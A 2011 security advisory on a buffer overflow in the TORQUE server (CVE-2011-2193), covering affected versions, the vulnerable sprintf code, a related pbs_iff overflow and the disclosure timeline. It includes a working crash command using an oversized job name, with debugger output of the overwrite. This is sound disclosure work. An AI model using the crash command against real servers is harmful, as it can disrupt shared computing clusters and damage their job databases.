Torque Server Buffer Overflow Vulnerability


Name: Torque Server Buffer Overflow Vulnerability Author: Adam Zabrocki (<pi3@itsec.pl>) Bartlomiej Balcerek (<bartol@pwr.wroc.pl>) Maciej Kotowicz (<maciej.kotowicz@pwr.wroc.pl>) Date: March 27, 2011 Risk: Moderate CVE: CVE-2011-2193 Description: TORQUE Resource Manager provides control over batch jobs and distributed computing resources. It is an advanced open-source product based on the original PBS project* and incorporates the best of both community and professional development. It incorporates significant advances in the areas of scalability, reliability, and functionality and is currently in use at tens of thousands of leading government, academic, and commercial sites throughout the world. TORQUE may be freely used, modified, and distributed under the constraints of the included license. TORQUE is commonly used in most of the GRID projects including WLCG, EGEE, etc. Details: A buffer overflow vulnerability has been found in the Torque server. This was reported to the EGI SVG (RT 1870) as well as to the Torque software providers. This has been fixed by the Torque Providers, and an updated version is also available in EPEL. Torque server does not check the length of "job name" argument before using it - this string is verified only on the client side. It is possible to use modified Torque client or DRMAA interface to submit job with arbitrary chosen job name in terms of length and content. Thus, it is possible to attacker to overflow buffer and overwrite some Torque server process internal data causing its specific behavior. What can be overwritten is log_buffer global string array and all next symbols: 0000000000734b00 B log_buffer 0000000000738b00 B msg_registerrel 0000000000738b08 B msg_manager 0000000000738b10 B msg_startup1 0000000000738b18 B msg_momnoexec1 0000000000738b20 B msg_man_uns 0000000000738b28 B msg_sched_nocall 0000000000738b30 B msg_issuebad 0000000000738b38 B stdout@@GLIBC_2.2.5 0000000000738b40 B msg_job_end_stat 0000000000738b48 b dtor_idx.6147 0000000000738b50 b completed.6145 0000000000738b58 b acct_opened 0000000000738b5c b acct_auto_switch 0000000000738b60 b acctfile 0000000000738b68 b acct_opened_day 0000000000738b70 b spaceused 0000000000738b78 b spaceavail 0000000000738b80 b username.6360 0000000000738bc0 b groupname.6402 Here is example how to submit the crafted job: [bartol@bartek_torque torque-mod]$ echo /bin/date | ./src/cmds/qsub -Z "Job_Name=`perl -e 'print "A"x16350'`" It is possible now to see in debugger that structures adjacent to log_buffer are overwritten with "A" chars (encoded as 0x41 numbers): Program received signal SIGINT, Interrupt. 0x00000033550cd323 in __select_nocancel () from /lib64/libc.so.6 (gdb) x/20x 0x0000000000738b00 0x738b00 <msg_registerrel>: 0x4141414141414141 0x4141414141414141 0x738b10 <msg_startup1>: 0x4141414141414141 0x4141414141414141 0x738b20 <msg_man_uns>: 0x4141414141414141 0x4141414141414141 The overflow occurs in the following code: 1560 sprintf(log_buffer, msg_jobnew, 1561 preq->rq_user, preq->rq_host, 1562 pj->ji_wattr[(int)JOB_ATR_job_owner].at_val.at_str, 1563 pj->ji_wattr[(int)JOB_ATR_jobname].at_val.at_str, 1564 pj->ji_qhdr->qu_qs.qu_name); We proved that server crash is easily possible (including database damage) and we think privilege escalation can be done with some more effort as well, but the latter is strongly dependable on particular build flags and architecture. The overflow is also possible in pbs_iff setuid binary, since the "host" variable length is not checked: sprintf(log_buffer,"cannot resolve IP address for host '%s' herror=%d: %s", hostname, /*1*/ h_errno, hstrerror(h_errno)); Affected Software: Versions of Torque prior to Torque 2.4.14 and also Torque 3.0.[0,1] References: CVE assignment: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2193 RH bug: https://bugzilla.redhat.com/show_bug.cgi?id=711463 RH release for SL5: https://admin.fedoraproject.org/updates/torque-2.3.13-2.el5 Cluster resources ref. http://www.clusterresources.com/pipermail/torqueusers/2011-June/012982.html Timeline: Yyyy-mm-dd 2011-05-10 Vulnerability reported to EGI SVG by Bartlomiej Balcerek, in addition to reporting to software providers 2011-05-10 Acknowledgement from the EGI SVG to the reporter 2011-06-06 Software provider states issue fixed 2011-06-07 Bug subitted in RH EPEL, as EGI mostly uses EPEL distribution 2011-06-22 Updated packages formally released in EPEL 2011-06-24 Public disclosure by the EGI SVG -- http://pi3.com.pl